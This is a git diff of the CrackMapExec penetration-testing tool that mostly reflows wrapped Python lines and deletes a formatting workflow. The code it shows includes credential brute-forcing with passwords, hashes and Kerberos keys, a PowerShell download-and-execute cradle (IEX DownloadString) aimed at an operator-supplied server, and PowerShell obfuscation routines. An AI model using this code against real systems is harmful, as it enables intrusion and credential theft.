diff --git a/.github/workflows/black-formating.yml b/.github/workflows/black-formating.yml deleted file mode 100644 index ff187e7e..00000000 --- a/.github/workflows/black-formating.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: Black-action -on: [push, pull_request] -jobs: - linter_name: - name: runner / black formatter - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v2 - - uses: rickstaa/action-black@v1 - with: - black_args: ". --check" \ No newline at end of file diff --git a/build_collector.py b/build_collector.py index e8275cb2..ac7aea63 100644 --- a/build_collector.py +++ b/build_collector.py @@ -52,9 +52,7 @@ def build_cme(): [shutil.rmtree(p) for p in Path("build").glob("**/*.dist-info")] env = Environment( - built_at=datetime.utcfromtimestamp(int(time.time())).strftime( - "%Y-%m-%d %H:%M:%S" - ), + built_at=datetime.utcfromtimestamp(int(time.time())).strftime("%Y-%m-%d %H:%M:%S"), entry_point="cme.crackmapexec:main", script=None, compile_pyc=False, @@ -74,9 +72,7 @@ def build_cme(): def build_cmedb(): print("building CMEDB") env = Environment( - built_at=datetime.utcfromtimestamp(int(time.time())).strftime( - "%Y-%m-%d %H:%M:%S" - ), + built_at=datetime.utcfromtimestamp(int(time.time())).strftime("%Y-%m-%d %H:%M:%S"), entry_point="cme.cmedb:main", script=None, compile_pyc=False, diff --git a/cme/cli.py b/cme/cli.py index 940bae85..67baf27a 100755 --- a/cme/cli.py +++ b/cme/cli.py @@ -63,14 +63,10 @@ def gen_cli_args(): ) parser.add_argument("--darrell", action="store_true", help="give Darrell a hand") parser.add_argument("--verbose", action="store_true", help="enable verbose output") - parser.add_argument( - "--debug", action="store_true", help="enable debug level information" - ) + parser.add_argument("--debug", action="store_true", help="enable debug level information") parser.add_argument("--version", action="store_true", help="Display CME version") - subparsers = parser.add_subparsers( - title="protocols", dest="protocol", description="available protocols" - ) + subparsers = parser.add_subparsers(title="protocols", dest="protocol", description="available protocols") std_parser = argparse.ArgumentParser(add_help=False) std_parser.add_argument( @@ -104,17 +100,13 @@ def gen_cli_args(): default=[], help="password(s) or file(s) containing passwords", ) - std_parser.add_argument( - "-k", "--kerberos", action="store_true", help="Use Kerberos authentication" - ) + std_parser.add_argument("-k", "--kerberos", action="store_true", help="Use Kerberos authentication") std_parser.add_argument( "--use-kcache", action="store_true", help="Use Kerberos authentication from ccache file (KRB5CCNAME)", ) - std_parser.add_argument( - "--log", metavar="LOG", help="Export result into a custom file" - ) + std_parser.add_argument("--log", metavar="LOG", help="Export result into a custom file") std_parser.add_argument( "--aesKey", metavar="AESKEY", @@ -149,9 +141,7 @@ def gen_cli_args(): module_parser = argparse.ArgumentParser(add_help=False) mgroup = module_parser.add_mutually_exclusive_group() - mgroup.add_argument( - "-M", "--module", action="append", metavar="MODULE", help="module to use" - ) + mgroup.add_argument("-M", "--module", action="append", metavar="MODULE", help="module to use") module_parser.add_argument( "-o", metavar="MODULE_OPTION", @@ -160,9 +150,7 @@ def gen_cli_args(): dest="module_options", help="module options", ) - module_parser.add_argument( - "-L", "--list-modules", action="store_true", help="list available modules" - ) + module_parser.add_argument("-L", "--list-modules", action="store_true", help="list available modules") module_parser.add_argument( "--options", dest="show_module_options", @@ -197,9 +185,7 @@ def gen_cli_args(): for protocol in protocols.keys(): protocol_object = p_loader.load_protocol(protocols[protocol]["path"]) - subparsers = getattr(protocol_object, protocol).proto_args( - subparsers, std_parser, module_parser - ) + subparsers = getattr(protocol_object, protocol).proto_args(subparsers, std_parser, module_parser) if len(sys.argv) == 1: parser.print_help() diff --git a/cme/cmedb.py b/cme/cmedb.py index 59287af4..f2c2a6f4 100644 --- a/cme/cmedb.py +++ b/cme/cmedb.py @@ -27,9 +27,7 @@ class UserExitedProto(Exception): def create_db_engine(db_path): - db_engine = create_engine( - f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True - ) + db_engine = create_engine(f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True) return db_engine @@ -135,9 +133,7 @@ class DatabaseNavigator(cmd.Cmd): # Users if command == "creds": if len(line) < 3: - print( - "[-] invalid arguments, export creds " - ) + print("[-] invalid arguments, export creds ") return filename = line[2] @@ -177,9 +173,7 @@ class DatabaseNavigator(cmd.Cmd): # Hosts elif command == "hosts": if len(line) < 3: - print( - "[-] invalid arguments, export hosts " - ) + print("[-] invalid arguments, export hosts ") return csv_header_simple = ( @@ -226,9 +220,7 @@ class DatabaseNavigator(cmd.Cmd): # Shares elif command == "shares": if len(line) < 3: - print( - "[-] invalid arguments, export shares " - ) + print("[-] invalid arguments, export shares ") return shares = self.db.get_shares() @@ -262,9 +254,7 @@ class DatabaseNavigator(cmd.Cmd): # Local Admin elif command == "local_admins": if len(line) < 3: - print( - "[-] invalid arguments, export local_admins " - ) + print("[-] invalid arguments, export local_admins ") return # These values don't change between simple and detailed @@ -293,9 +283,7 @@ class DatabaseNavigator(cmd.Cmd): print("[+] Local Admins exported") elif command == "dpapi": if len(line) < 3: - print( - "[-] invalid arguments, export dpapi " - ) + print("[-] invalid arguments, export dpapi ") return # These values don't change between simple and detailed @@ -341,9 +329,7 @@ class DatabaseNavigator(cmd.Cmd): filename = line[2] write_list(filename, writable_keys) else: - print( - "[-] Invalid argument, specify creds, hosts, local_admins, shares or dpapi" - ) + print("[-] Invalid argument, specify creds, hosts, local_admins, shares or dpapi") @staticmethod def help_export(): @@ -391,11 +377,7 @@ class DatabaseNavigator(cmd.Cmd): creds = r.json() for cred in creds["creds"]: - if ( - cred["credtype"] == "token" - or cred["credtype"] == "krbtgt" - or cred["username"].endswith("$") - ): + if cred["credtype"] == "token" or cred["credtype"] == "krbtgt" or cred["username"].endswith("$"): continue self.db.add_credential( cred["credtype"], @@ -449,9 +431,7 @@ class CMEDBMenu(cmd.Cmd): self.config.set("CME", "last_used_db", proto) self.write_configfile() try: - proto_menu = getattr(db_nav_object, "navigator")( - self, getattr(db_object, "database")(self.conn), proto - ) + proto_menu = getattr(db_nav_object, "navigator")(self, getattr(db_object, "database")(self.conn), proto) proto_menu.cmdloop() except UserExitedProto: pass @@ -553,9 +533,7 @@ def initialize_db(logger): conn = connect(proto_db_path) c = conn.cursor() # try to prevent some weird sqlite I/O errors - c.execute( - "PRAGMA journal_mode = OFF" - ) # could try setting to PERSIST if DB corruption starts occurring + c.execute("PRAGMA journal_mode = OFF") # could try setting to PERSIST if DB corruption starts occurring c.execute("PRAGMA foreign_keys = 1") # set a small timeout (5s) so if another thread is writing to the database, the entire program doesn't crash c.execute("PRAGMA busy_timeout = 5000") diff --git a/cme/connection.py b/cme/connection.py index 49f10b16..b59f93e3 100755 --- a/cme/connection.py +++ b/cme/connection.py @@ -22,24 +22,10 @@ user_failed_logins = {} def gethost_addrinfo(hostname): try: - for res in getaddrinfo( - hostname, - None, - AF_INET6, - SOCK_DGRAM, - IPPROTO_IP, - AI_CANONNAME, - ): + for res in getaddrinfo( hostname, None, AF_INET6, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME): af, socktype, proto, canonname, sa = res except socket.gaierror: - for res in getaddrinfo( - hostname, - None, - AF_INET, - SOCK_DGRAM, - IPPROTO_IP, - AI_CANONNAME, - ): + for res in getaddrinfo( hostname, None, AF_INET, SOCK_DGRAM, IPPROTO_IP, AI_CANONNAME): af, socktype, proto, canonname, sa = res if canonname == "": return sa[0] @@ -96,9 +82,7 @@ class connection(object): try: self.proto_flow() except Exception as e: - self.logger.exception( - f"Exception while calling proto_flow() on target {self.host}: {e}" - ) + self.logger.exception(f"Exception while calling proto_flow() on target {self.host}: {e}") @staticmethod def proto_args(std_parser, module_parser): @@ -174,9 +158,7 @@ class connection(object): context.localip = self.local_ip if hasattr(module, "on_request") or hasattr(module, "has_response"): - self.logger.debug( - f"Module {module.name} has on_request or has_response methods" - ) + self.logger.debug(f"Module {module.name} has on_request or has_response methods") self.server.connection = self self.server.context.localip = self.local_ip @@ -188,10 +170,7 @@ class connection(object): self.logger.debug(f"Module {module.name} has on_admin_login method") module.on_admin_login(context, self) - if ( - not hasattr(module, "on_request") - and not hasattr(module, "has_response") - ) and hasattr(module, "on_shutdown"): + if (not hasattr(module, "on_request") and not hasattr(module, "has_response")) and hasattr(module, "on_shutdown"): self.logger.debug(f"Module {module.name} has on_shutdown method") module.on_shutdown(context, self) @@ -237,9 +216,7 @@ class connection(object): c_id, username, password, cred_type = cred if cred_type == "key": key_data = self.db.get_keys(cred_id=cred_id)[0].data - if self.plaintext_login( - username, password, private_key=key_data - ): + if self.plaintext_login(username, password, private_key=key_data): return True else: # will probably need to add additional checks here for each protocol, but this was initially @@ -262,35 +239,15 @@ class connection(object): elif self.args.domain: domain = self.args.domain - if cred_type == "hash" and not self.over_fail_limit( - username - ): + if cred_type == "hash" and not self.over_fail_limit(username): if self.args.kerberos: - if self.kerberos_login( - domain, - username, - "", - password, - "", - self.kdcHost, - False, - ): + if self.kerberos_login( domain, username, "", password, "", self.kdcHost, False): return True elif self.hash_login(domain, username, password): return True - elif cred_type == "plaintext" and not self.over_fail_limit( - username - ): + elif cred_type == "plaintext" and not self.over_fail_limit(username): if self.args.kerberos: - if self.kerberos_login( - domain, - username, - password, - "", - "", - self.kdcHost, - False, - ): + if self.kerberos_login( domain, username, password, "", "", self.kdcHost, False): return True elif self.plaintext_login(domain, username, password): return True @@ -300,9 +257,7 @@ class connection(object): with sem: username = self.args.username[0] if len(self.args.username) else "" password = self.args.password[0] if len(self.args.password) else "" - self.kerberos_login( - self.domain, username, password, "", "", self.kdcHost, True - ) + self.kerberos_login(self.domain, username, password, "", "", self.kdcHost, True) return True for user in self.args.username: if isfile(user): @@ -319,71 +274,27 @@ class connection(object): with open(ntlm_hash, "r") as ntlm_hash_file: if not self.args.no_bruteforce: for f_hash in ntlm_hash_file: - if not self.over_fail_limit( - usr.strip() - ): + if not self.over_fail_limit(usr.strip()): if self.args.kerberos: - if self.kerberos_login( - self.domain, - usr.strip(), - "", - f_hash.strip(), - "", - self.kdcHost, - False, - ): + if self.kerberos_login(self.domain,usr.strip(),"",f_hash.strip(),"",self.kdcHost,False): return True - elif self.hash_login( - self.domain, - usr.strip(), - f_hash.strip(), - ): + elif self.hash_login( self.domain, usr.strip(), f_hash.strip()): return True elif self.args.no_bruteforce: - user_file.seek( - 0 - ) # HACK: this should really not be in the usr for loop - for usr, f_hash in zip( - user_file, ntlm_hash_file - ): - if not self.over_fail_limit( - usr.strip() - ): + user_file.seek(0) # HACK: this should really not be in the usr for loop + for usr, f_hash in zip(user_file, ntlm_hash_file): + if not self.over_fail_limit(usr.strip()): if self.args.kerberos: - if self.kerberos_login( - self.domain, - usr.strip(), - "", - f_hash.strip(), - "", - self.kdcHost, - False, - ): + if self.kerberos_login( self.domain, usr.strip(), "", f_hash.strip(), "", self.kdcHost, False): return True - elif self.hash_login( - self.domain, - usr.strip(), - f_hash.strip(), - ): + elif self.hash_login( self.domain, usr.strip(), f_hash.strip()): return True else: # ntlm_hash is a string if not self.over_fail_limit(usr.strip()): if self.args.kerberos: - if self.kerberos_login( - self.domain, - usr.strip(), - "", - ntlm_hash.strip(), - "", - self.kdcHost, - False, - ): + if self.kerberos_login( self.domain, usr.strip(), "", ntlm_hash.strip(), "", self.kdcHost, False): return True - elif self.hash_login( - self.domain, - usr.strip(), - ntlm_hash.strip(), - ): + elif self.hash_login( self.domain, usr.strip(), ntlm_hash.strip()): return True elif self.args.password: with sem: @@ -392,89 +303,39 @@ class connection(object): with open(password, "r") as password_file: if not self.args.no_bruteforce: for f_pass in password_file: - if not self.over_fail_limit( - usr.strip() - ): + if not self.over_fail_limit(usr.strip()): if hasattr(self.args, "domain"): if self.args.kerberos: - if self.kerberos_login( - self.domain, - usr.strip(), - f_pass.strip(), - "", - "", - self.kdcHost, - False, - ): + if self.kerberos_login( self.domain, usr.strip(), f_pass.strip(), "", "", self.kdcHost, False): return True - elif self.plaintext_login( - self.domain, - usr.strip(), - f_pass.strip(), - ): + elif self.plaintext_login( self.domain, usr.strip(), f_pass.strip()): return True else: - if self.plaintext_login( - usr.strip(), - f_pass.strip(), - ): + if self.plaintext_login( usr.strip(), f_pass.strip()): return True elif self.args.no_bruteforce: - user_file.seek( - 0 - ) # HACK: this should really not be in the usr for loop - for usr, f_pass in zip( - user_file, password_file - ): - if not self.over_fail_limit( - usr.strip() - ): + user_file.seek(0) # HACK: this should really not be in the usr for loop + for usr, f_pass in zip(user_file, password_file): + if not self.over_fail_limit(usr.strip()): if hasattr(self.args, "domain"): if self.args.kerberos: - if self.kerberos_login( - self.domain, - usr.strip(), - f_pass.strip(), - "", - "", - self.kdcHost, - False, - ): + if self.kerberos_login( self.domain, usr.strip(), f_pass.strip(), "", "", self.kdcHost, False): return True - elif self.plaintext_login( - self.domain, - usr.strip(), - f_pass.strip(), - ): + elif self.plaintext_login( self.domain, usr.strip(), f_pass.strip()): return True else: - if self.plaintext_login( - usr.strip(), - f_pass.strip(), - ): + if self.plaintext_login( usr.strip(), f_pass.strip()): return True else: # password is a string if not self.over_fail_limit(usr.strip()): if hasattr(self.args, "domain"): if self.args.kerberos: - if self.kerberos_login( - self.domain, - usr.strip(), - password, - "", - "", - self.kdcHost, - False, - ): + if self.kerberos_login( self.domain, usr.strip(), password, "", "", self.kdcHost, False): return True - elif self.plaintext_login( - self.domain, usr.strip(), password - ): + elif self.plaintext_login(self.domain, usr.strip(), password): return True else: - if self.plaintext_login( - usr.strip(), password - ): + if self.plaintext_login(usr.strip(), password): return True else: # user is a string if hasattr(self.args, "hash") and self.args.hash: @@ -485,36 +346,16 @@ class connection(object): for f_hash in ntlm_hash_file: if not self.over_fail_limit(user): if self.args.kerberos: - if self.kerberos_login( - self.domain, - user, - "", - ntlm_hash.strip(), - "", - self.kdcHost, - False, - ): + if self.kerberos_login( self.domain, user, "", ntlm_hash.strip(), "", self.kdcHost, False): return True - elif self.hash_login( - self.domain, user, f_hash.strip() - ): + elif self.hash_login(self.domain, user, f_hash.strip()): return True else: # ntlm_hash is a string if not self.over_fail_limit(user): if self.args.kerberos: - if self.kerberos_login( - self.domain, - user, - "", - ntlm_hash.strip(), - "", - self.kdcHost, - False, - ): + if self.kerberos_login( self.domain, user, "", ntlm_hash.strip(), "", self.kdcHost, False): return True - elif self.hash_login( - self.domain, user, ntlm_hash.strip() - ): + elif self.hash_login(self.domain, user, ntlm_hash.strip()): return True elif self.args.password: with sem: @@ -525,42 +366,20 @@ class connection(object): if not self.over_fail_limit(user): if hasattr(self.args, "domain"): if self.args.kerberos: - if self.kerberos_login( - self.domain, - user, - f_pass.strip(), - "", - "", - self.kdcHost, - False, - ): + if self.kerberos_login( self.domain, user, f_pass.strip(), "", "", self.kdcHost, False): return True - elif self.plaintext_login( - self.domain, user, f_pass.strip() - ): + elif self.plaintext_login(self.domain, user, f_pass.strip()): return True else: - if self.plaintext_login( - user, f_pass.strip() - ): + if self.plaintext_login(user, f_pass.strip()): return True else: # password is a string if not self.over_fail_limit(user): if hasattr(self.args, "domain"): if self.args.kerberos: - if self.kerberos_login( - self.domain, - user, - password, - "", - "", - self.kdcHost, - False, - ): + if self.kerberos_login( self.domain, user, password, "", "", self.kdcHost, False): return True - elif self.plaintext_login( - self.domain, user, password - ): + elif self.plaintext_login(self.domain, user, password): return True else: if self.plaintext_login(user, password): @@ -569,15 +388,7 @@ class connection(object): with sem: for aesKey in self.args.aesKey: if not self.over_fail_limit(user): - if self.kerberos_login( - self.domain, - user, - "", - "", - aesKey.strip(), - self.kdcHost, - False, - ): + if self.kerberos_login( self.domain, user, "", "", aesKey.strip(), self.kdcHost, False): return True def mark_pwned(self): diff --git a/cme/crackmapexec.py b/cme/crackmapexec.py index d7e70782..a9108b18 100755 --- a/cme/crackmapexec.py +++ b/cme/crackmapexec.py @@ -32,16 +32,12 @@ from rich.progress import Progress try: import librlers except: - print( - "Incompatible python version, try with another python version or another binary 3.8 / 3.9 / 3.10 / 3.11 that match your python version (python -V)" - ) + print("Incompatible python version, try with another python version or another binary 3.8 / 3.9 / 3.10 / 3.11 that match your python version (python -V)") exit(1) def create_db_engine(db_path): - db_engine = sqlalchemy.create_engine( - f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True - ) + db_engine = sqlalchemy.create_engine(f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True) return db_engine @@ -61,10 +57,7 @@ async def start_run(protocol_obj, args, db, targets): total=total, ) cme_logger.debug(f"Creating thread for {protocol_obj}") - futures = [ - executor.submit(protocol_obj, args, db, target) - for target in targets - ] + futures = [executor.submit(protocol_obj, args, db, target) for target in targets] for future in as_completed(futures): current += 1 progress.update(tasks, completed=current) @@ -95,9 +88,7 @@ def main(): cme_logger.debug(f"Passed args: {args}") if args.darrell: - links = ( - open(path_join(DATA_PATH, "videos_for_darrell.harambe")).read().splitlines() - ) + links = open(path_join(DATA_PATH, "videos_for_darrell.harambe")).read().splitlines() try: webbrowser.open(random.choice(links)) exit(1) @@ -108,9 +99,7 @@ def main(): if args.protocol == "ssh": if args.key_file: if not args.password: - cme_logger.fail( - f"Password is required, even if a key file is used - if no passphrase for key, use `-p ''`" - ) + cme_logger.fail(f"Password is required, even if a key file is used - if no passphrase for key, use `-p ''`") exit(1) if args.use_kcache and not os.environ.get("KRB5CCNAME"): @@ -189,9 +178,7 @@ def main(): exit(0) elif args.module and args.show_module_options: for module in args.module: - cme_logger.display( - f"{module} module options:\n{modules[module]['options']}" - ) + cme_logger.display(f"{module} module options:\n{modules[module]['options']}") exit(0) elif args.module: cme_logger.debug(f"Modules to be Loaded: {args.module}, {type(args.module)}") @@ -205,12 +192,8 @@ def main(): if not module.opsec_safe: if ignore_opsec: - cme_logger.debug( - f"ignore_opsec is set in the configuration, skipping prompt" - ) - cme_logger.display( - f"Ignore OPSEC in configuration is set and OPSEC unsafe module loaded" - ) + cme_logger.debug(f"ignore_opsec is set in the configuration, skipping prompt") + cme_logger.display(f"Ignore OPSEC in configuration is set and OPSEC unsafe module loaded") else: ans = input( highlight( @@ -254,17 +237,13 @@ def main(): except Exception as e: cme_logger.error(f"Error loading module server for {module}: {e}") - cme_logger.debug( - f"proto_object: {protocol_object}, type: {type(protocol_object)}" - ) + cme_logger.debug(f"proto_object: {protocol_object}, type: {type(protocol_object)}") cme_logger.debug(f"proto object dir: {dir(protocol_object)}") # get currently set modules, otherwise default to empty list current_modules = getattr(protocol_object, "module", []) current_modules.append(module) setattr(protocol_object, "module", current_modules) - cme_logger.debug( - f"proto object module after adding: {protocol_object.module}" - ) + cme_logger.debug(f"proto object module after adding: {protocol_object.module}") if hasattr(args, "ntds") and args.ntds and not args.userntds: ans = input( diff --git a/cme/first_run.py b/cme/first_run.py index bb2e2821..3a6267a7 100755 --- a/cme/first_run.py +++ b/cme/first_run.py @@ -51,9 +51,7 @@ def first_run_setup(logger=cme_logger): config.get("BloodHound", "bh_enabled") config.get("CME", "log_mode") except (NoSectionError, NoOptionError): - logger.display( - "Old configuration file detected, replacing with new version" - ) + logger.display("Old configuration file detected, replacing with new version") default_path = path_join(DATA_PATH, "cme.conf") shutil.copy(default_path, CME_PATH) diff --git a/cme/helpers/bloodhound.py b/cme/helpers/bloodhound.py index ac291031..89bb4ce0 100644 --- a/cme/helpers/bloodhound.py +++ b/cme/helpers/bloodhound.py @@ -36,24 +36,14 @@ def add_user_bh(user, domain, logger, config): user_owned = info["username"] + "@" + info["domain"] account_type = "User" - result = tx.run( - f'MATCH (c:{account_type} {{name:"{user_owned}"}}) RETURN c' - ) + result = tx.run(f'MATCH (c:{account_type} {{name:"{user_owned}"}}) RETURN c') if result.data()[0]["c"].get("owned") in (False, None): - logger.debug( - f'MATCH (c:{account_type} {{name:"{user_owned}"}}) SET c.owned=True RETURN c.name AS name' - ) - result = tx.run( - f'MATCH (c:{account_type} {{name:"{user_owned}"}}) SET c.owned=True RETURN c.name AS name' - ) - logger.highlight( - f"Node {user_owned} successfully set as owned in BloodHound" - ) + logger.debug(f'MATCH (c:{account_type} {{name:"{user_owned}"}}) SET c.owned=True RETURN c.name AS name') + result = tx.run(f'MATCH (c:{account_type} {{name:"{user_owned}"}}) SET c.owned=True RETURN c.name AS name') + logger.highlight(f"Node {user_owned} successfully set as owned in BloodHound") except AuthError as e: - logger.error( - f"Provided Neo4J credentials ({config.get('BloodHound', 'bh_user')}:{config.get('BloodHound', 'bh_pass')}) are not valid." - ) + logger.error(f"Provided Neo4J credentials ({config.get('BloodHound', 'bh_user')}:{config.get('BloodHound', 'bh_pass')}) are not valid.") return except ServiceUnavailable as e: logger.error(f"Neo4J does not seem to be available on {uri}.") diff --git a/cme/helpers/misc.py b/cme/helpers/misc.py index b88a701e..7d956750 100755 --- a/cme/helpers/misc.py +++ b/cme/helpers/misc.py @@ -36,11 +36,7 @@ def called_from_cmd_args(): for stack in inspect.stack(): if stack[3] == "print_host_info": return True - if ( - stack[3] == "plaintext_login" - or stack[3] == "hash_login" - or stack[3] == "kerberos_login" - ): + if stack[3] == "plaintext_login" or stack[3] == "hash_login" or stack[3] == "kerberos_login": return True if stack[3] == "call_cmd_args": return True diff --git a/cme/helpers/powershell.py b/cme/helpers/powershell.py index 7392fb12..6d5bc08f 100644 --- a/cme/helpers/powershell.py +++ b/cme/helpers/powershell.py @@ -39,17 +39,13 @@ def obfs_ps_script(path_to_script): with open(obfs_ps_script, "r") as script: return script.read() - cme_logger.display( - "Performing one-time script obfuscation, go look at some memes cause this can take a bit..." - ) + cme_logger.display("Performing one-time script obfuscation, go look at some memes cause this can take a bit...") invoke_obfs_command = f"powershell -C 'Import-Module {get_ps_script('invoke-obfuscation/Invoke-Obfuscation.psd1')};Invoke-Obfuscation -ScriptPath {get_ps_script(path_to_script)} -Command \"TOKEN,ALL,1,OUT {obfs_ps_script}\" -Quiet'" cme_logger.debug(invoke_obfs_command) with open(os.devnull, "w") as devnull: - return_code = call( - invoke_obfs_command, stdout=devnull, stderr=devnull, shell=True - ) + return_code = call(invoke_obfs_command, stdout=devnull, stderr=devnull, shell=True) cme_logger.success("Script obfuscated successfully") @@ -65,18 +61,7 @@ def obfs_ps_script(path_to_script): # strip block comments stripped_code = re.sub(re.compile("<#.*?#>", re.DOTALL), "", script.read()) # strip blank lines, lines starting with #, and verbose/debug statements - stripped_code = "\n".join( - [ - line - for line in stripped_code.split("\n") - if ( - (line.strip() != "") - and (not line.strip().startswith("#")) - and (not line.strip().lower().startswith("write-verbose ")) - and (not line.strip().lower().startswith("write-debug ")) - ) - ] - ) + stripped_code = "\n".join([line for line in stripped_code.split("\n") if ((line.strip() != "") and (not line.strip().startswith("#")) and (not line.strip().lower().startswith("write-verbose ")) and (not line.strip().lower().startswith("write-debug ")))]) return stripped_code @@ -167,18 +152,14 @@ else break if obfs_attempts == 4: - cme_logger.error( - f"Command exceeds maximum length of 8191 chars (was {len(command)}). exiting." - ) + cme_logger.error(f"Command exceeds maximum length of 8191 chars (was {len(command)}). exiting.") exit(1) obfs_attempts += 1 else: command = f"powershell.exe -noni -nop -w 1 -enc {encode_ps_command(command)}" if len(command) > 8191: - cme_logger.error( - f"Command exceeds maximum length of 8191 chars (was {len(command)}). exiting." - ) + cme_logger.error(f"Command exceeds maximum length of 8191 chars (was {len(command)}). exiting.") exit(1) return command @@ -221,9 +202,7 @@ if (($injected -eq $False) -or ($inject_once -eq $False)){{ ) if context: - return gen_ps_iex_cradle( - context, "Invoke-PSInject.ps1", ps_code, post_back=False - ) + return gen_ps_iex_cradle(context, "Invoke-PSInject.ps1", ps_code, post_back=False) return ps_code @@ -244,9 +223,7 @@ IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/{ps_scri ).strip() elif type(scripts) is list: - launcher = ( - "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n" - ) + launcher = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n" launcher += "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'" for script in scripts: launcher += "IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/{script}')\n".format( @@ -309,9 +286,7 @@ def invoke_obfuscation(script_string): random_delimiters.append(i) # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. - random_delimiters = [ - choice(random_delimiters) for _ in range(int(len(random_delimiters) / 4)) - ] + random_delimiters = [choice(random_delimiters) for _ in range(int(len(random_delimiters) / 4))] # Convert $ScriptString to delimited ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. delimited_encoded_array = "" @@ -339,35 +314,13 @@ def invoke_obfuscation(script_string): for delim in random_delimiters: # Random case 'split' string. split = "".join(choice([i.upper(), i.lower()]) for i in "Split") - random_delimiters_to_print_for_dash_split += ( - "-" + split + choice(["", " "]) + "'" + delim + "'" + choice(["", " "]) - ) + random_delimiters_to_print_for_dash_split += "-" + split + choice(["", " "]) + "'" + delim + "'" + choice(["", " "]) - random_delimiters_to_print_for_dash_split = ( - random_delimiters_to_print_for_dash_split.strip("\t\n\r") - ) + random_delimiters_to_print_for_dash_split = random_delimiters_to_print_for_dash_split.strip("\t\n\r") # Randomly select between various conversion syntax options. random_conversion_syntax = [ - "[" - + char_str - + "]" - + choice(["", " "]) - + "[" - + integer - + "]" - + choice(["", " "]) - + "$_", - "[" - + integer - + "]" - + choice(["", " "]) - + "$_" - + choice(["", " "]) - + choice(["-as", "-As", "-aS", "-AS"]) - + choice(["", " "]) - + "[" - + char_str - + "]", + "[" + char_str + "]" + choice(["", " "]) + "[" + integer + "]" + choice(["", " "]) + "$_", + "[" + integer + "]" + choice(["", " "]) + "$_" + choice(["", " "]) + choice(["-as", "-As", "-aS", "-AS"]) + choice(["", " "]) + "[" + char_str + "]", ] random_conversion_syntax = choice(random_conversion_syntax) @@ -387,30 +340,14 @@ def invoke_obfuscation(script_string): # https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables set_ofs_var_syntax = [ - "Set-Item" - + choice([" " * 1, " " * 2]) - + "'Variable:OFS'" - + choice([" " * 1, " " * 2]) - + "''", - choice(["Set-Variable", "SV", "SET"]) - + choice([" " * 1, " " * 2]) - + "'OFS'" - + choice([" " * 1, " " * 2]) - + "''", + "Set-Item" + choice([" " * 1, " " * 2]) + "'Variable:OFS'" + choice([" " * 1, " " * 2]) + "''", + choice(["Set-Variable", "SV", "SET"]) + choice([" " * 1, " " * 2]) + "'OFS'" + choice([" " * 1, " " * 2]) + "''", ] set_ofs_var = choice(set_ofs_var_syntax) set_ofs_var_back_syntax = [ - "Set-Item" - + choice([" " * 1, " " * 2]) - + "'Variable:OFS'" - + choice([" " * 1, " " * 2]) - + "' '", - "Set-Item" - + choice([" " * 1, " " * 2]) - + "'Variable:OFS'" - + choice([" " * 1, " " * 2]) - + "' '", + "Set-Item" + choice([" " * 1, " " * 2]) + "'Variable:OFS'" + choice([" " * 1, " " * 2]) + "' '", + "Set-Item" + choice([" " * 1, " " * 2]) + "'Variable:OFS'" + choice([" " * 1, " " * 2]) + "' '", ] set_ofs_var_back = choice(set_ofs_var_back_syntax) @@ -421,114 +358,16 @@ def invoke_obfuscation(script_string): # Generate the code that will decrypt and execute the payload and randomly select one. baseScriptArray = [ "[" + char_str + "[]" + "]" + choice(["", " "]) + encoded_array, - "(" - + choice(["", " "]) - + "'" - + delimited_encoded_array - + "'." - + split - + "(" - + choice(["", " "]) - + "'" - + random_delimiters_to_print - + "'" - + choice(["", " "]) - + ")" - + choice(["", " "]) - + "|" - + choice(["", " "]) - + for_each_object - + choice(["", " "]) - + "{" - + choice(["", " "]) - + "(" - + choice(["", " "]) - + random_conversion_syntax - + ")" - + choice(["", " "]) - + "}" - + choice(["", " "]) - + ")", - "(" - + choice(["", " "]) - + "'" - + delimited_encoded_array - + "'" - + choice(["", " "]) - + random_delimiters_to_print_for_dash_split - + choice(["", " "]) - + "|" - + choice(["", " "]) - + for_each_object - + choice(["", " "]) - + "{" - + choice(["", " "]) - + "(" - + choice(["", " "]) - + random_conversion_syntax - + ")" - + choice(["", " "]) - + "}" - + choice(["", " "]) - + ")", - "(" - + choice(["", " "]) - + encoded_array - + choice(["", " "]) - + "|" - + choice(["", " "]) - + for_each_object - + choice(["", " "]) - + "{" - + choice(["", " "]) - + "(" - + choice(["", " "]) - + random_conversion_syntax - + ")" - + choice(["", " "]) - + "}" - + choice(["", " "]) - + ")", + "(" + choice(["", " "]) + "'" + delimited_encoded_array + "'." + split + "(" + choice(["", " "]) + "'" + random_delimiters_to_print + "'" + choice(["", " "]) + ")" + choice(["", " "]) + "|" + choice(["", " "]) + for_each_object + choice(["", " "]) + "{" + choice(["", " "]) + "(" + choice(["", " "]) + random_conversion_syntax + ")" + choice(["", " "]) + "}" + choice(["", " "]) + ")", + "(" + choice(["", " "]) + "'" + delimited_encoded_array + "'" + choice(["", " "]) + random_delimiters_to_print_for_dash_split + choice(["", " "]) + "|" + choice(["", " "]) + for_each_object + choice(["", " "]) + "{" + choice(["", " "]) + "(" + choice(["", " "]) + random_conversion_syntax + ")" + choice(["", " "]) + "}" + choice(["", " "]) + ")", + "(" + choice(["", " "]) + encoded_array + choice(["", " "]) + "|" + choice(["", " "]) + for_each_object + choice(["", " "]) + "{" + choice(["", " "]) + "(" + choice(["", " "]) + random_conversion_syntax + ")" + choice(["", " "]) + "}" + choice(["", " "]) + ")", ] # Generate random JOIN syntax for all above options new_script_array = [ choice(baseScriptArray) + choice(["", " "]) + join + choice(["", " "]) + "''", join + choice(["", " "]) + choice(baseScriptArray), - str_join - + "(" - + choice(["", " "]) - + "''" - + choice(["", " "]) - + "," - + choice(["", " "]) - + choice(baseScriptArray) - + choice(["", " "]) - + ")", - '"' - + choice(["", " "]) - + "$(" - + choice(["", " "]) - + set_ofs_var - + choice(["", " "]) - + ")" 